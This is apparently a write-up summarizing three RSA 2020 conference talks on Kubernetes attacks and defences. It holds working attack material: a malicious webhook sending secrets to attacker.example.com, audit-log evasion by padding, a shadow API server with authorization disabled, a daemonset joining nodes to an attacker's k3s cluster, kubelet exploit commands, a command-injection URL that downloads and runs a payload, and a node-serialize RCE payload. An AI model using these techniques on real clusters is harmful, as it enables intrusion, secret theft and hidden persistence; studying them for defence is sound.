RSA 2020 Kubernetes Talks

Kubernetes Highlights from RSA 2020

An overview of the talks given at the RSA 2020 conference regarding Kubernetes security threats and mitigations. Ian Coldwater and Brad Geesaman go over advanced threats facing the ecosystem today. Jay Beale provides a walkthrough demonstration of escalating privileges in a game of “Bust-a-Kube”, and Eviatar Gerzi discusses issues and safeguards of RBAC in Kubernetes.

Talks:

Advanced Persistence Threats: The Future of Kubernetes Attacks

Ian Coldwater, Lead Platform Security Engineer, Salesforce

Brad Geesaman, Security Consultant, DARKBIT

Video - Link

Slides - Link

Intro

An introduction to Kubernetes, including its less-than-ideal architecture with regards to security and authentication.

What an Attacker might want:

  • get into the cluster
  • steal administrator keys (gain cluster-admin privilege)
  • hide actions from audit logs and monitoring
  • exfiltrate data (like k8s secrets)
  • establish and maintain persistence
  • expand control laterally and ‘upward’ in the cloud

Tapping into the API Server data flow

Validating Webhooks for Evil

Assume admin access: the attacker has control of all data and features in the cluster. This is a great starting point for persistence.

An attacker can see secrets in real time as they are created and updated via the api-server by adding a validating webhook. More info about Admission Webhooks can be found in the kubernetes docs.

Validating webhooks can forward requests to addresses outside of the cluster. A malicious webhook can simply ‘read’ all secrets created as part of the validating webhook request flow.

Validating webhooks require TLS, which can be generated per-webhook. Here’s a script for creating signed certs, from the istio installation steps: webhook-create-signed-cert.sh
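
As a rough sketch, such a malicious configuration might look something like the following (the names, external URL, and CA bundle are hypothetical; failurePolicy: Ignore means the webhook never rejects requests, which helps it stay unnoticed):

apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  name: innocuous-sounding-webhook          # hypothetical name
webhooks:
- name: watcher.example.com                 # hypothetical
  admissionReviewVersions: ["v1"]
  sideEffects: None
  failurePolicy: Ignore                     # never block requests; stay quiet
  rules:
  - apiGroups: [""]
    apiVersions: ["v1"]
    operations: ["CREATE", "UPDATE"]
    resources: ["secrets"]                  # every secret create/update flows here
  clientConfig:
    url: https://attacker.example.com/exfil # out-of-cluster endpoint
    caBundle: <base64-encoded CA for the attacker's TLS cert>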

Cluster admins should watch for modifications to validatingwebhookconfigurations and alert when changes occur.

Oversized Requests for Obfuscation

In GKE, customers have no control over the control plane or the auditing service, which makes it hard for an attacker to avoid detection entirely. An attacker can, however, limit the information acquired by the auditing service.

Any event or ‘change in state’ in Kubernetes has an associated audit log sent to a central logging service. To prevent requests from being audited and logged, one can take advantage of a limit on how much the audit service can parse into a single log entry.

For Google’s StackDriver, this size is 256KB. Creating a request that is ‘too large’ causes the audit parsing service to ‘give up’ and only record metadata.

So, we have the following situation:

Objective: Prevent audit logs from recording suspicious specs (or any changes that might arouse suspicion)

Facts:

  • Maximum size of a Kubernetes API request is 1.5 MiB
  • Max parseable field size in GKE for an audit log is 256KB

This can be done by padding the annotations field of a request with a large amount of junk data, which hides everything that appears after the annotations.
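
A minimal sketch of the idea (object names are hypothetical; 300KB of padding comfortably clears the 256KB parse limit while staying under the 1.5 MiB request cap):

# pad the annotations with ~300KB of junk; annotations precede the spec,
# so the audit entry degrades to metadata-only and the spec goes unrecorded
JUNK=$(head -c 300000 /dev/zero | tr '\0' 'A')
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: shady-pod
  annotations:
    padding: "${JUNK}"
spec:
  containers:
  - name: main
    image: alpine
    command: ["sleep", "3600"]
EOF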

In-Cluster Shadow API Server

Now that you can hide your dirty deeds, what else?

Why use the ‘official’ api-server?

If you can run a pod on the same node as the api-server, you should also have access to the TLS certs needed to talk to etcd, as well as network access to etcd.

With your very own access to etcd, you control the cluster.

To get this special privilege, spin up a replica of the api-server with the same keys and network path as the ‘real’ api-server.

This maintains a persistent access channel to the ‘source of truth’ for a cluster: etcd.

In the demo, they run the kube-apiserver with the following flags:

- --allow-privileged=true
- --anonymous-auth=true
- --authorization-mode=AlwaysAllow
- --insecure-port=443

allow-privileged is normal and expected.

anonymous-auth is something that is not typically enabled (this presumably also means anyone with network access to this pod will have cluster access). From the flag’s documentation:

Enables anonymous requests to the secure port of the API server. Requests that are not rejected by another authentication method are treated as anonymous requests. Anonymous requests have a username of system:anonymous, and a group name of system:unauthenticated.

authorization-mode is set to AlwaysAllow. From the flag’s documentation:

This flag allows all requests. Use this flag only if you do not require authorization for your API requests.

insecure-port serves plain HTTP with no TLS, but here runs on port 443 to look like ‘normal’ traffic
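
Putting it together, a shadow api-server launch might look roughly like this (a sketch only; the cert paths assume a kubeadm-style control plane and will differ elsewhere):

kube-apiserver \
  --etcd-servers=https://127.0.0.1:2379 \
  --etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt \
  --etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt \
  --etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key \
  --allow-privileged=true \
  --anonymous-auth=true \
  --authorization-mode=AlwaysAllow \
  --insecure-port=443 \
  --insecure-bind-address=0.0.0.0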

Taking a Deeper Look at --insecure-port

This flag shows up in the source code as deprecated here, but with a hanging issue left in a comment:

// Though this flag is deprecated, we discovered security concerns over how to do health checks without it e.g. #43784

The issue, titled Recommended liveness check for kube-apiserver, is still open as of Kubernetes v1.17.3.

This also shows up in the documentation here, and an excerpt:

By default the Kubernetes API server serves HTTP on 2 ports:
Localhost Port:
- is intended for testing and bootstrap, and for other components of the master node (scheduler, controller-manager) to talk to the API
- no TLS
- default is port 8080, change with --insecure-port flag.
- default IP is localhost, change with --insecure-bind-address flag.
- request bypasses authentication and authorization modules.
- request handled by admission control module(s).
- protected by need to have host access

c2bernetes: Use Kubernetes as a C2 infrastructure across multiple clusters

The goal: deploy a persistence mechanism that leaves the least amount of logs tracking activity and has the greatest chance of going undetected for the longest amount of time, by installing an agent on all nodes that joins them to an external cluster under the attacker’s control.

Using k3s, which is a smaller, simpler kubernetes distribution.

Advantages:

  • small single binary
  • all the same moving parts as Kubernetes
  • only a single TLS connection outbound from the nodes to the control plane

Deployment Steps:

  • Install the control-plane component on a VM owned by the attacker in another cloud
  • Craft a workload that:
    • is deployed as a daemonset, to run on all nodes in the cluster under attack
    • escapes the container on the attacked cluster’s nodes via chroot into the rootfs of the host node
    • creates a separate docker network for the k3s agent
    • runs a k3s agent that connects back to the attacker’s control-plane

Notes: hostPath mounts the node’s filesystem. There’s a great talk from Ian Coldwater and Duffie Cooley at Black Hat 2019; here’s the video link for that talk.

Add tolerations so the Kubernetes scheduler can schedule this daemonset on all nodes in the cluster. A rough sketch of such a daemonset follows.
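
A minimal sketch, assuming the k3s binary has already been staged onto each host (the image, names, and attacker endpoint are hypothetical):

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: kube-agent                 # innocuous-looking name
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: kube-agent
  template:
    metadata:
      labels:
        app: kube-agent
    spec:
      hostNetwork: true
      tolerations:
      - operator: Exists           # tolerate every taint: run on all nodes
      containers:
      - name: agent
        image: alpine
        securityContext:
          privileged: true
        # chroot into the host rootfs, then join the attacker's k3s control plane
        command: ["chroot", "/host", "sh", "-c",
                  "k3s agent --server https://<attacker-vm>:6443 --token <token>"]
        volumeMounts:
        - name: hostfs
          mountPath: /host
      volumes:
      - name: hostfs
        hostPath:
          path: /                  # the node's entire root filesystem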

From here, it’s easy to create daemonsets to steal all secrets, or cloud instance metadata.

Bring kubelet-exploit back

New Features, old tricks

Ephemeral Containers are used for debugging containers that have stripped-down images, allowing admins to execute commands in sidecar containers. Ephemeral containers are especially useful when combined with process namespace sharing, which makes processes visible to all other containers in a pod.

Dynamic Audit Sinks control where audit logs go, allowing attackers to filter logs to help cover their tracks and avoid detection. Dynamic kubelet configuration allows changing kubelet configuration ‘on the fly’.

kubelet-exploit was created when default kubelet configurations were less secure and allowed running arbitrary commands in any pod on that node.

Now that reconfiguring the kubelet service is so easy (via the API), exploiting old hacks again is possible (and easy).

Use an attack pod to hit the kubelet api, i.e.

Step 1: Launch attack pod

kubectl run attackpod --image=raesene/alpine-nettools:latest

Step 2: curl local node’s kubelet API directly, expecting an Unauthorized response

kubectl exec -it <attack-pod> -- /bin/sh -c 'curl -sk https://172.17.0.3:10250/runningpods/'

Step 3: Modify the kubelet config (see the sketch after this list)

  • disable the authentication webhook
  • enable anonymous auth
  • set authorization mode to AlwaysAllow (forget about security policy)
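
As a sketch, those three changes correspond to the following KubeletConfiguration fields (assuming the v1beta1 config schema):

apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: true        # accept unauthenticated requests
  webhook:
    enabled: false       # stop delegating token checks to the api-server
authorization:
  mode: AlwaysAllow      # authorize everything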

Step 4: Update the kubelet configuration via the API to tell the worker to use the new kubelet config

Step 5: Run the same attack pod, now allowed to curl kubelet API

Step 6: If able to execute commands on kube-proxy, you are one step closer to ‘owning’ the node

# use 'kubelet-exploit' to run commands in an arbitrary container now that kubelet is open again
kubectl exec -it <attack-pod> -- /bin/sh -c "curl -sk -XPOST -d 'cmd=ls /' https://172.17.0.3:10250/run/kube-system/<kube-proxy-pod>/kube-proxy"

Mitigation Steps

  • Alert on critical cluster audit logs for changes to webhooks, dynamic config items, and RBAC permissions
  • Review feature gate flag settings and RBAC policies for correct permissions
  • Try out new features of new k8s releases in a dev environment to develop a plan for upgrades and future versions
    • upgrading in place avoids picking up new security features (as opposed to spinning up a new cluster and migrating to it)
  • Implement your plan for future features as the newer versions become available

Kubernetes Practical Attack and Defense

Jay Beale, CTO, InGuardians

Video – Link

Slides – Link

Attack Surface of Kubernetes

Overview of Pods, Nodes, Services, and an overview of the pieces that make up a cluster (api-server, etcd server, controller manager, scheduler, kube-dns, kubelet, kube-proxy, container runtime, etc)

Prep

Bust-A-Kube Demo

Step 1: Web Vuln into Cluster

Find a vulnerability in a web app hosted on Kubernetes, then break out Metasploit via a URL request from the browser:

http://<ip>:30354/index.php?stone=mind-stone.txt;curl -o /tmp/mrsbin http://<hosted-exploit-ip>/mrsbin; chmod ugo+rx /tmp/mrsbin; /tmp/mrsbin&submit=Show+Stone+Information

Once the vulnerability is found, a shell is created on the service.

Step 2: Kubernetes Inspection

Start looking for tell-tale files to answer “am I in a cluster?”, e.g. /var/run/secrets

Get the serviceaccount token and creds to see what access privileges the current container has in the cluster:

alias kubectl="kubectl --server=https://10.23.58.40:6443 --token=`cat /var/run/secrets/kubernetes.io/serviceaccount/token` --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"

You can list other services and query them, e.g.

kubectl get services
curl -s http://<service-of-interest>

Step 3: NodeJS Serialization Issue

Deserialization is a gold mine for bugs. For NodeJS applications, we can take advantage of this known exploit: Exploiting Node.js deserialization bug for Remote Code Execution (ref: CVE-2017-5941)

Craft an exploit-node-deserialize-with-msf.txt file containing a one-line serialized string. When the NodeJS application deserializes this string, it runs a function that executes a remote shell with mrsbin.
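
A sketch of what such a payload can look like for the node-serialize bug (the key name and command here are hypothetical); the trailing () turns the serialized function into an IIFE, so it executes during deserialization:

# write the one-line serialized payload; the quoted EOF prevents shell expansion
cat > exploit-node-deserialize-with-msf.txt <<'EOF'
{"flag":"_$$ND_FUNC$$_function(){ require('child_process').exec('/tmp/mrsbin') }()"}
EOF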

curl http://<service-of-interest>/acquired?flag=<payload>

Step 4: Jenkins is YOUR butler

Challenge: Additional privileges are given when Jenkins is considered ‘down’

Take advantage of kubernetes services load-balancing across pods that match a specific label.

Any pod in that namespace with labels matching the selectors for that service will receive traffic for that service.

It won’t get all of the service’s traffic, but it will get some.

Create a service that returns a 500 HTTP response to ‘trick’ the system into thinking Jenkins is down.

When the isjenkins service’s /isitup endpoint doesn’t receive a 200 response, it returns a TOKEN that has escalated privileges. Update the kubectl alias with the new TOKEN and update the secret.
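
A hypothetical sketch of the decoy (the label and image are assumptions; any pod whose labels match the service selector starts receiving a share of the probes):

# run a pod matching the jenkins service selector that answers every
# request with HTTP 500, so some /isitup probes see a 'down' Jenkins
kubectl run jenkins-decoy \
  --labels="app=jenkins" \
  --image=<attacker-image-that-returns-500>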

Step 5: Own the Hosts

Investigate privileges of new serviceaccount in jenkins pod

kubectl auth can-i create pods

Investigate whether you can run pods on the master node (launch a daemonset with the right tolerations that mounts a node host volume).

Master nodes have a taint, a Kubernetes construct for limiting which pods can run on a specific node. Pods can declare that they may run on tainted nodes with tolerations in their pod spec.
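
For example, tolerating the standard master taint used by kubeadm-era clusters looks like this in a pod spec:

tolerations:
- key: node-role.kubernetes.io/master    # the control-plane node taint
  operator: Exists
  effect: NoSchedule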

Once on the master node, break glass with the master node’s .kube/config certs.

Peirates

Peirates, a Kubernetes penetration tool, enables an attacker to escalate privilege and pivot through a Kubernetes cluster. It automates known techniques to steal and collect service accounts, obtain further code execution, and gain control of the cluster.

Open source and available on GitHub

Compromising Kubernetes Cluster by Exploiting RBAC Permissions

Eviatar Gerzi, Security Researcher, CyberArk

Video – Link

Slides – Link

Diving into ServiceAccounts

An associated RBAC (Role-Based Access Control) role is attached via a RoleBinding or ClusterRoleBinding to a specific serviceaccount.

In a default install of Kubernetes: 43 (Cluster)RoleBindings, 51 (Cluster)Roles, 38 Subjects

Which ones have “Risky Permissions” (where a risky permission is one that can be used to escalate privileges)?

Risky Permission No 1. - Pod Creation

Keep in mind, there are many ways to create a container (replicationcontroller, replicaset, deployment, daemonset, statefulset, job, cronjob, pod). For now, we focus on creating pods with the pods resource.

Scenario 1: Secret Extraction

Assume a cluster role that can create pods:

rules:
- apiGroups: ["*"]
  resources: ["pods"]
  verbs: ["create"]

You can specify a serviceAccountName when creating a pod.

The attack scenario is:

  • attacker creates pod with privileged token
  • use privileged token to list all secrets from api-server
  • send secrets back to attacker

The attacker needs to find a serviceAccount that matches the attacker’s needs, i.e. (get, list, watch) -> (secrets)
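
A minimal sketch of the attack pod (the pod name and service account name are hypothetical):

apiVersion: v1
kind: Pod
metadata:
  name: token-grabber
spec:
  serviceAccountName: <privileged-sa>    # an SA with get/list/watch on secrets
  containers:
  - name: shell
    image: alpine
    # the privileged SA's token is automounted here for the taking
    command: ["sh", "-c",
              "cat /var/run/secrets/kubernetes.io/serviceaccount/token"]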

Scenario 2: Privileged Container

Run containers with a privileged securityContext, which allows for mounting host devices in the container, as well as other fun things.
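
The relevant pod spec fragment is small (a sketch; the container name and image are placeholders):

spec:
  containers:
  - name: priv-shell
    image: alpine
    securityContext:
      privileged: true     # disables most isolation; host devices become mountable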

If you haven’t seen the talk by Maya Kaczorowski and Sam “Frenchie” Stewart about privileged containers, watch it! Presentation Link

Scenario 3: Docker socks

By mounting the docker host socket /var/run/docker.sock, an attacker can communicate with all other containers on the host.
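
A sketch of such a pod (using an image that ships a docker CLI is an assumption):

spec:
  containers:
  - name: sock-shell
    image: docker:stable             # any image with a docker CLI
    command: ["sleep", "3600"]
    volumeMounts:
    - name: dockersock
      mountPath: /var/run/docker.sock
  volumes:
  - name: dockersock
    hostPath:
      path: /var/run/docker.sock     # the node's Docker daemon socket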

Risky Permission No 2. - Reading Secrets

rules:
- apiGroups: ["*"]
  resources: ["secrets"]
  verbs: ["get"]

Remember, get must specify the object name, whereas list will list all objects.

So, how do you get the secret name? Brute force.

Known secrets have known prefixes, e.g. bootstrap-signer-token, but the “token ID” suffix is not known.

However, it can be brute-forced.
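
A hypothetical brute-force loop (generation of the candidate wordlist is left out; the suffixes are short lowercase-alphanumeric strings):

# try each candidate suffix; a non-error response means the guess was right
for suffix in $(cat suffixes.txt); do
  kubectl get secret "bootstrap-signer-token-${suffix}" -n kube-system 2>/dev/null \
    && echo "found: bootstrap-signer-token-${suffix}"
done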

Mitigation

  • prevent service account token automounting on pods (see the sketch after this list)
  • grant (Cluster)RoleBindings to specific users
  • use Roles and RoleBindings instead of ClusterRoles and ClusterRoleBindings (Cluster* affects all namespaces)
  • namespace separation
  • use KubiScan
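
A sketch of the first mitigation, disabling token automounting on a pod (this can also be set on the ServiceAccount itself):

apiVersion: v1
kind: Pod
metadata:
  name: no-token-pod
spec:
  automountServiceAccountToken: false   # no SA token mounted into the pod
  containers:
  - name: app
    image: alpine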

KubiScan

github url

A tool for scanning a Kubernetes cluster for risky permissions in Kubernetes’s Role-based access control (RBAC) authorization model.

  • Identify risky Roles\ClusterRoles
  • Identify risky RoleBindings\ClusterRoleBindings
  • Identify risky Subjects (Users, Groups and ServiceAccounts)
  • Identify risky Pods\Containers